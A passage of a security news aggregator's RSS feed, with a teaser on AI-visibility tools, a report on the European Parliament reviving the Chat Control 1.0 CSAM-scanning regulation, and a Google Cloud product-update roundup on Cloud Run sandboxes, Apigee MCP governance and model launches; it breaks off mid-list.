<guid isPermaLink="true">https://tsecurity.de/de/3664547/it-security-nachrichten/die-5-besten-ki-sichtbarkeits-tools-2026-der-komplette-vergleich/</guid>
<pubDate>Mon, 13 Jul 2026 09:38:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/07/13/die-5-besten-ki-sichtbarkeits-tools-2026-der-komplette-vergleich/">Die 5 besten KI-Sichtbarkeits-Tools 2026: Der komplette Vergleich</a> erschien zuerst beim Online-Magazin <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Über <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a> startest du jeden Morgen bestens informiert in den Tag.</p>
<p>Wenn deine potenziellen Kunden ChatGPT, Claude oder Perplexity zu deiner Branche befragen – und Analysten wie Gartner davon ausgehen, dass KI-Chatbots bis 2026 einen wachsenden Anteil des klassischen Suchmaschinen-Volumens übernehmen –, dann gibt es eine neue Software-Kategorie, die du bewerten solltest. KI-Sichtbarkeits-Tools verfolgen, wie deine Marke in den Antworten dieser KI-Engines auftaucht (oder eben nicht) […]</p>
<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/07/13/die-5-besten-ki-sichtbarkeits-tools-2026-der-komplette-vergleich/">Die 5 besten KI-Sichtbarkeits-Tools 2026: Der komplette Vergleich</a> erschien zuerst auf <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Folge uns auch auf <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV0poYzJsamRHaHBibXRwYm1jdVpHVXZZbXh2WnlnQVAB" target="_blank">Google News</a> und <a href="https://flipboard.com/@BASICthinking" target="_blank">Flipboard</a> oder abonniere <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[European Parliament Revives Controversial Chat Scanning Law]]></title>
<description><![CDATA[The Chat Control 1.0 framework has been revived after the European Parliament voted to restore the legal basis that allows major technology companies to voluntarily scan users' private communications for Child Sexual Abuse Material (CSAM). The decision, taken on July 9, comes months after the tem...]]></description>
<link>https://tsecurity.de/de/3664301/it-security-nachrichten/european-parliament-revives-controversial-chat-scanning-law/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664301/it-security-nachrichten/european-parliament-revives-controversial-chat-scanning-law/</guid>
<pubDate>Mon, 13 Jul 2026 07:37:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Chat-Control-1.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Chat Control" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Chat-Control-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="European Parliament Revives Controversial Chat Scanning Law 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="372" data-end="824">The Chat Control 1.0 framework has been revived after the <a href="https://thecyberexpress.com/european-parliament-data-breach/" target="_blank" rel="noopener">European Parliament</a> voted to restore the legal basis that allows major technology companies to voluntarily scan users' private communications for <a href="https://thecyberexpress.com/eu-csam-law-gap-child-sexual-exploitation-risk/" target="_blank" rel="noopener">Child Sexual Abuse Material</a> (CSAM). The decision, taken on July 9, comes months after the temporary regulation expired in April and has reignited debate over privacy, surveillance, and the future of online safety laws in the <a href="https://thecyberexpress.com/enisa-and-commission/" target="_blank" rel="noopener">European Union</a>.</p>
<p data-start="826" data-end="1186">The vote was held on the final sitting day before the Parliament's summer recess. Under an urgent legislative procedure, rejecting the proposal required an absolute majority of all Members of the European Parliament rather than a simple majority of those present. As a result, the proposal passed despite more lawmakers present voting against it than in favor.</p>

<h3 data-section-id="1jb6ks5" data-start="1188" data-end="1244"><strong><span role="text">Chat Control 1.0 Restores Voluntary CSAM Scanning</span></strong></h3>
<p data-start="1246" data-end="1501">The revived regulation, formally known as Regulation (EU) 2021/1232, provides the legal basis for online platforms to voluntarily scan private communications for known and new Child Sexual Abuse Material (CSAM) as well as the solicitation of children.</p>
<p data-start="1503" data-end="1727">The original regulation was introduced in 2021 as a temporary derogation from the ePrivacy Directive. It expired in April after lawmakers failed to agree on a long-term replacement amid widespread concerns over user <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-privacy/" title="privacy" data-wpil-keyword-link="linked" data-wpil-monitor-id="28928">privacy</a>.</p>
<p data-start="1729" data-end="2047">Although several technology companies continued voluntary scanning after the regulation lapsed, European authorities had warned that doing so without a legal basis could expose platforms to legal uncertainty. The restored framework does not authorize scanning on end-to-end encrypted messaging services such as Signal.</p>

<h3 data-section-id="1sydelx" data-start="2049" data-end="2084"><strong>Urgent Procedure Draws Criticism</strong></h3>
<p data-start="2086" data-end="2411">The <a href="https://cdt.org/insights/return-of-mass-scanning-of-private-communications-through-undemocratic-procedure/" target="_blank" rel="nofollow noopener">renewed proposal</a> followed an urgent legislative process that critics described as highly unusual. According to CDT Europe, the Parliament had previously rejected a similar proposal in March, but the issue returned through a fast-tracked second-reading procedure supported by European Parliament President Roberta Metsola.</p>
<p data-start="2413" data-end="2732">Because the proposal was treated as a second reading, opponents needed at least 361 votes to block it. While a simple majority supported rejecting the measure during voting, it did not reach the higher threshold required under the urgent procedure. Reduced attendance before the summer recess also affected the outcome.</p>
<p data-start="2734" data-end="2854">Only two amendments were adopted during the process, both aimed at preserving protections for <a href="https://thecyberexpress.com/eu-agrees-on-child-sexual-abuse-detection-law/" target="_blank" rel="noopener">end-to-end encryption</a>.</p>

<h3 data-section-id="12ev3io" data-start="2856" data-end="2905"><strong>Debate Continues Over Permanent CSAM Framework</strong></h3>
<p data-start="2907" data-end="3163">The revival of Chat Control 1.0 comes shortly after negotiations on the proposed Child Sexual Abuse Material Regulation (CSAR) ended without agreement on June 29. Discussions on the permanent framework are expected to resume after the summer break.</p>
<p data-start="3165" data-end="3464">CDT Europe argued that restoring the temporary regulation could complicate ongoing negotiations over the long-term legislative framework. The organization said questions surrounding voluntary or mandatory scanning require careful legal and technical assessment before permanent rules are introduced.</p>

<h3 data-section-id="qt09lz" data-start="3466" data-end="3511"><strong>Questions Raised Over the Need for Urgency</strong></h3>
<p data-start="3513" data-end="3707">Supporters of the urgent procedure argued that allowing the temporary regulation to expire would create an immediate regulatory gap for online platforms investigating <a href="https://thecyberexpress.com/eu-csam-law-gap-child-sexual-exploitation-risk/" target="_blank" rel="noopener">child sexual abuse content</a>.</p>
<p data-start="3709" data-end="3967">However, CDT Europe challenged that justification, pointing to statements from the German Federal Police, which reportedly acknowledged there was no direct connection between the expiration of the temporary regulation and the number of CSAM reports received.</p>
<p data-start="3969" data-end="4405">The organization also noted that several legal mechanisms remain available even without the temporary derogation. These include targeted telecommunications surveillance with judicial authorization, electronic evidence preservation under the EU's e-evidence framework, existing content removal and reporting processes under the <a href="https://thecyberexpress.com/dsa-child-protection-investigation/" target="_blank" rel="noopener">Digital Services Act</a>, and hash-matching technology that identifies previously verified CSAM for human review.</p>

<h3 data-section-id="1eca2tw" data-start="4407" data-end="4433"><strong>Privacy Concerns Remain</strong></h3>
<p data-start="4435" data-end="4783">Following the vote, CDT Europe said it opposed both the outcome and the legislative process used to restore the regulation. The organization stated it would continue advocating for a future Child Sexual Abuse Material Regulation (CSAR) that rejects indiscriminate mass scanning while protecting end-to-end encryption and fundamental rights.</p>
<p data-start="4785" data-end="5027">The renewed Chat Control 1.0 regulation restores the legal framework for voluntary scanning by online platforms, but the broader debate over balancing child protection, privacy, and digital rights in the European Union remains unresolved.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s new with Google Cloud]]></title>
<description><![CDATA[Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: Google Cloud bl...]]></description>
<link>https://tsecurity.de/de/3662833/it-security-nachrichten/whats-new-with-google-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662833/it-security-nachrichten/whats-new-with-google-cloud/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p data-block-key="kgod7">Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. </p><hr><p data-block-key="ru1z9"><b>Tip</b>: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: <a href="https://cloud.google.com/blog/topics/inside-google-cloud/complete-list-google-cloud-blog-links-2021">Google Cloud blog 101: Full list of topics, links, and resources</a>.</p><hr><p data-block-key="b0lnw"></p></div>
<div class="block-aside"><dl>
    <dt>aside_block</dt>
    <dd>&lt;ListValue: []&gt;</dd>
</dl></div>
<div class="block-paragraph_advanced"><h3>Jul 6 - Jul 10</h3>
<ul>
<li><strong>Webinar: Introducing Google Cloud NGFW Enterprise advanced malware protection - powered by Palo Alto Networks<br></strong>Discover the new Cloud NGFW advanced malware sandbox, arriving in preview later this year. Powered by Palo Alto Networks Advanced Wildfire, it leverages data from 70,000+ customers to help defeat advanced malware. Join us on July 16 at 11 AM EDT to learn how to build a resilient, zero-trust cloud infrastructure that protects your apps and data, wherever they reside.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="18" href="https://www.brighttalk.com/webcast/18282/668861?utm_source=GCBlog" rel="noreferrer noopener" target="_blank">Register for the webinar now</a></li>
<li><strong>Safely run AI-generated code in Cloud Run sandboxes<br></strong>Cloud Run sandboxes, now in public preview, are lightweight, isolated execution boundaries that you can spawn near-instantly <strong>within your existing Cloud Run service instances</strong>.<br><br>Whether you need to let an LLM run a dynamically generated Python script to calculate business margins or spin up a headless browser to perform web research, Cloud Run sandboxes give you a secure, isolated sandbox to run these tasks without leaving your serverless environment.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="22" href="https://cloud.google.com/blog/topics/developers-practitioners/google-cloud-run-sandboxes-are-in-public-preview" rel="noreferrer noopener" target="_blank">Read the blog</a><span> to learn more and get started today.</span></li>
<li><strong>Australia API Horizon: Scaling Enterprise Governed AI Agents<br></strong>The transition from AI chatbots to autonomous agents is the most critical integration point for your business. Join Google Cloud at our upcoming events to explore exclusive deep-dive sessions on architecting for the agentic era.<br><br>Discover how to use Apigee as an intelligent AI Gateway to govern, secure, and scale high-performance architectures. You will learn to seamlessly build AI tools from your existing APIs and maintain control over your entire ecosystem.<br><br>Join us in your preferred city:
<ul>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="36" href="https://goo.gle/4voh18S" rel="noreferrer noopener" target="_blank"><strong>Sydney:</strong> July 28, 2026, at Google Sydney, One Darling Island.</a></li>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="37" href="https://goo.gle/4h2x0FS" rel="noreferrer noopener" target="_blank"><strong>Canberra:</strong> July 29, 2026, at Hotel Realm.</a></li>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="38" href="https://goo.gle/4yisb1F" rel="noreferrer noopener" target="_blank"><strong>Melbourne:</strong> August 4, 2026, at Google Melbourne.</a></li>
</ul>
</li>
<li><strong>Build highly available, multi-region services on Cloud Run<br></strong>Maintaining uptime for business-critical applications just got a lot easier on Cloud Run. Service health, now Generally Available, automates cross-region failover by leveraging readiness probes for instance-level health checks with a simple, two-click setup. You can configure service health with global external Application Load Balancers for public-facing applications or cross-region internal Application Load Balancers for private networking traffic.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="42" href="https://cloud.google.com/run/docs/configuring/configure-service-health" rel="noreferrer noopener" target="_blank">Learn how to configure service health for Cloud Run.</a></li>
<li><strong>Report: 83% of organizations need infrastructure upgrades for agentic AI<br></strong>The shift from conversational bots to autonomous agents is breaking legacy systems. Our new <em>State of AI Infrastructure</em> report details how engineering leaders are adapting to these massive new workloads. To eliminate inference bottlenecks, control hidden scaling costs, and manage agent sprawl, the industry is rapidly moving toward fluid compute, centralized governance, and unified, co-designed architectures.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="46" href="https://cloud.google.com/blog/products/compute/state-of-ai-infrastructure-report-overview?e=48754805" rel="noreferrer noopener" target="_blank">Explore our key infrastructure insights</a></li>
<li><strong>Stop tinkering, start scaling: the industrialized AI Playbook<br></strong>Did you know that only 5% of custom AI investments actually return measurable business value? The problem isn’t the technology—it’s how organizations are wired to run it.<br><br>In this compelling read, Google Cloud Consulting breaks down the operational blueprint that bridges the stark gap between "cool tech experiments" and real, P&amp;L-impacting enterprise ROI.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="50" href="https://www.google.com/url?q=https%3A%2F%2Fmedium.com%2F%40kjouannigot_73547%2Fscaling-trusted-ai-google-cloud-insights-to-capture-enterprise-roi-aa6c9b308adb" rel="noreferrer noopener" target="_blank">Read the full article on Medium</a></li>
<li><strong>AI Agent Clinic: Slashing App Latency by 80%<br></strong>Prototyping an AI agent is easy, but scaling for live traffic presents unique challenges. In the latest AI Agent Clinic, our technical experts partner with a developer to optimize PlaybackIQ, a live football analysis agent. This session demonstrates how to use OpenTelemetry to trace bottlenecks in the Gemini Enterprise Agent Platform and deploy to Cloud Run for high-concurrency scaling, achieving an 80% reduction in response time. Learn production-grade debugging strategies to optimize your own LLM applications.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="54" href="https://www.google.com/search?q=https://youtu.be/G7olcqETSn8" rel="noreferrer noopener" target="_blank">Watch the 60-minute teardown</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 29 - Jul 3</h3>
<ul>
<li><strong>Claude Sonnet 5, Anthropic’s latest model, is now available on Agent Platform</strong>. <br>This addition serves as a drop-in replacement for Sonnet 4.6, giving organizations expanded choice for task completion across enterprise workflows. It features enhanced reasoning, cleaner code generation, and computer use capabilities for desktop and browser workflows.<br><br>By continuing to rapidly bring frontier models to our platform, Google Cloud offers an uncompromised choice of the industry's best technology to build, test, and scale enterprise-grade AI.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://console.cloud.google.com/agent-platform/publishers/anthropic/model-garden/claude-sonnet-5?hl=en" rel="noreferrer noopener" target="_blank"><em>Get started today.</em></a></li>
<li>
<p><strong>Automate your AI governance with Apigee and YAML<br></strong><span>Manual API gateway configurations can quickly slow down your AI engineering velocity. Join the Apigee community on Thursday, July 16, to discover an automated, declarative blueprint for model garden management. Learn how a simple, repeatable YAML pattern lets your AI practitioners instantly spin up secure, policy-backed enterprise configurations  without friction. Bring your questions and connect during our live Q&amp;A session. </span></p>
<p><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 16 Community TechTalk</strong></a></p>
</li>
<li>
<p><strong>Build next-generation AI portals for autonomous agents<br></strong><span>Standard developer portals were designed for human developers to subscribe to static APIs. Today, autonomous agents, LLM toolkits, and dynamic runtimes demand a central nervous system for governance. Join our technical deep dive on Thursday, July 23, to explore Apigee's new AI Portals solution. You will see exactly how to deploy full-service, MCP powered hubs to safely manage enterprise self-service for models, tools, and agents. </span></p>
<p><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 23 Community TechTalk</strong></a></p>
</li>
<li><strong>Protect your infrastructure from advanced cyberattacks at the API layer (Presented in Portuguese)<br></strong>In an era of increasingly sophisticated threats, relying solely on traditional firewalls leaves critical data gaps. Join our technical community TechTalk on Thursday, July 30—conducted in Portuguese—to learn how to proactively mitigate risks directly at the gateway layer. This session demonstrates how to configure and govern essential Apigee security policies to build a robust line of defense, ensuring maximum availability and complete integrity for your enterprise microservices. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 30 Portuguese Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 22 - Jun 26</h3>
<ul>
<li><strong>Accelerate TPU model loading while saving RAM on GKE.<br></strong>Large model cold starts often stall scaling and leave high-value TPUs idle. The open-source <strong>Run:ai Model Streamer</strong> now natively supports TPUs with Google Cloud Storage in<strong> </strong><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://github.com/vllm-project/tpu-inference" rel="noreferrer noopener" target="_blank"><strong>TPU vLLM 0.18.0</strong>.</a> This integration accelerates inference pipelines on GKE by streaming tensors directly into CPU memory, bypassing local disk bottlenecks and the "double-buffering" trap. In benchmarks, loading a 480B parameter model was <strong>over 2x faster</strong> while cutting peak host memory usage by half. <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://discuss.google.dev/t/accelerate-tpu-model-loading-while-saving-ram-on-gke/374835" rel="noreferrer noopener" target="_blank"><strong>Read the full guide and get started today</strong></a>.</li>
<li><strong>Stop Training Blind: Scaling AI with the New OpenTelemetry-Based TPU AI Telemetry Collector Agent<br></strong>Google Cloud’s new AI Telemetry Collector agent standardizes TPU monitoring using OpenTelemetry. It optimizes enterprise ML workloads by identifying silent failures and providing zero-cost operational metrics without draining host CPU cycles. The agent seamlessly routes telemetry to Google Cloud Monitoring or Prometheus and custom Grafana setups. Pre-installed on Google-optimized Ubuntu images or available via Docker, it tracks memory, network latency, and core utilization to maximize multi-node training efficiency.<br><br>You can read more of this capability by clicking this <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://discuss.google.dev/t/stop-training-blind-scaling-ai-with-the-new-opentelemetry-based-tpu-ai-telemetry-collector-agent/375210" rel="noreferrer noopener" target="_blank">link</a>.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 15 - Jun 19</h3>
<ul>
<li><strong>Join us for a deep dive into agentic AI control with AppyThings<br></strong>Your integrations aren’t failing—they are evolving. When users interact with AI agents, they no longer arrive directly at your site, resulting in experiences stripped of your context, expertise, and intended experience. Join us on Thursday, June 25, for a community tech talk in partnership with AppyThings to learn how to solve this new gateway challenge. We will explore how MTN laid an integration foundation with the Model Context Protocol (MCP) to deliver accurate, consistent experiences. Our technical experts will demonstrate how to leverage Apigee as a centralized tools management solution to govern agent access. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/3Sfle0y" rel="noreferrer noopener" target="_blank"><strong>Register for the session</strong></a></li>
<li><strong>Optimize Spot VM Deployments with Capacity Advisor for Spot, Now in Public Preview<br></strong>Google Compute Engine has launched <strong>Capacity Advisor for Spot</strong> to Public Preview, now open to all customers. This tool turns Spot capacity discovery into a data-driven process by providing real-time deployment recommendations to maximize obtainability and minimize preemption risks. Query the <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability" rel="noreferrer noopener" target="_blank"><strong>Capacity Advisor API</strong></a> for obtainability and minimum estimated uptimes, or use the new <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://console.cloud.google.com/compute/capacityAdvisor" rel="noreferrer noopener" target="_blank"><strong>Console UI</strong></a> featuring a global availability map, spot price lookups, and historical preemption rate trends to visually find the most cost-efficient compute capacity.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability" rel="noreferrer noopener" target="_blank">Get started today</a> to start optimizing your Spot VM deployments!</li>
<li><strong>Build a multi-tenant agentic AI system<br></strong>When scaling generative AI across different business units, your teams need specialized AI agents with unique operational rules and tools. Our new reference architecture helps you build a centralized multi-tenant platform to prevent fragmented silos, eliminate data exposure risks, and maintain unified compliance. Read the guide to <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/architecture/multi-tenant-agentic-ai-system" rel="noreferrer noopener" target="_blank">design and deploy a multi-tenant agentic AI system</a> in Google Cloud.</li>
<li><strong>How to Configure Gemini Enterprise to Connect to a Custom MCP Server<br></strong>The Gemini Enterprise MCP Connector was a big announcement at Google Cloud Next because it introduces the ability to connect Gemini Enterprise to MCP servers. This blog <a href="https://medium.com/google-cloud/how-to-configure-gemini-enterprise-to-connect-to-a-custom-mcp-server-2e28adc96420" rel="noopener" target="_blank">post</a> provides a step-by-step guide on how to configure your first Custom MCP Server connector using the Google Maps Ground Lite MCP server as an example. Once you understand this flow, you can configure multiple MCP servers with Gemini Enterprise to bring all the context you need.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 8 - Jun 12</h3>
<ul>
<li><strong>Simplify Multi-Cloud Planning with Cloud Location Finder, now Generally Available</strong> <br>Cloud Location Finder provides up-to-date data on public regions, zones, and Google Distributed Cloud Connected locations across Google Cloud, AWS, Azure, and OCI. You can now programmatically discover locations based on provider, proximity, territory, and carbon footprint to optimize your global infrastructure strategy for performance, compliance, and sustainability. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="14" href="https://cloud.google.com/location-finder/docs" rel="noreferrer noopener" target="_blank">Get started for free today</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 1 - Jun 5</h3>
<ul>
<li><strong>Modeling the physical world with BigQuery Graph</strong><br>Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://cloud.google.com/blog/products/data-analytics/modeling-a-digital-twin-using-bigquery-graph" rel="noreferrer noopener" target="_blank">post</a>, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.</li>
<li><strong>Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)<br></strong>Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4dyC2Ie" rel="noreferrer noopener" target="_blank"><strong>Register for the June 18 Spanish Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 25 - May 29</h3>
<ul>
<li>
<p><strong><a href="https://www.anthropic.com/news/claude-opus-4-8" rel="noopener" target="_blank"><span>Anthropic’s Claude Opus 4.8</span></a><span> is now available on </span><a href="https://console.cloud.google.com/vertex-ai/publishers/anthropic/model-garden/claude-opus-4-8"><span>Gemini Enterprise Agent Platform</span></a></strong><span><strong>. </strong></span><span>As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and tracking dependencies over extended sessions.</span></p>
</li>
<li><strong>API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs <br></strong>Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.<strong><br><br><a href="https://goo.gle/4dTxQmo" rel="noopener" target="_blank">Register now</a></strong></li>
<li><strong>Securing AI Agents: The Extended Agent Gateway Pattern<br></strong>Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.<br><br><a href="https://goo.gle/4fbAsxg" rel="noopener" target="_blank"><strong>Register for the June 4 Community TechTalk</strong></a></li>
<li><strong>API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP<br></strong>Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.<br><br><a href="https://goo.gle/4nVyjIr" rel="noopener" target="_blank"><strong>Register for the June 11 Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 18 - May 22</h3>
<ul>
<li><strong>Chinese Webinar | June 4: AI Command and Control<br></strong>As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.<br><br><a href="https://goo.gle/4dx4Lf5" rel="noopener" target="_blank">Register here</a></li>
<li><strong>GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases<br></strong>Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new <a href="https://cloud.google.com/blog/products/ai-machine-learning/benchmark-llms-on-device-with-ai-edge-portal" rel="noopener" target="_blank">capabilities</a> to benchmark and debug LLM performance across these devices. <a href="https://docs.google.com/forms/d/e/1FAIpQLSfTcGPycQve8TLAsfH46pBlXBZe9FrgJAClwbF7DeL1LgVn4Q/viewform" rel="noopener" target="_blank">Sign-up</a> to utilize these new features in private preview today.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 11 - May 15</h3>
<ul>
<li><strong>Build Your AI &amp; MCP Control Tower for Universal Governance<br></strong>Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.<br><br><a href="https://goo.gle/4u9slWF" rel="noopener" target="_blank">Register for the May 21 Community TechTalk</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 27 - May 1</h3>
<ul>
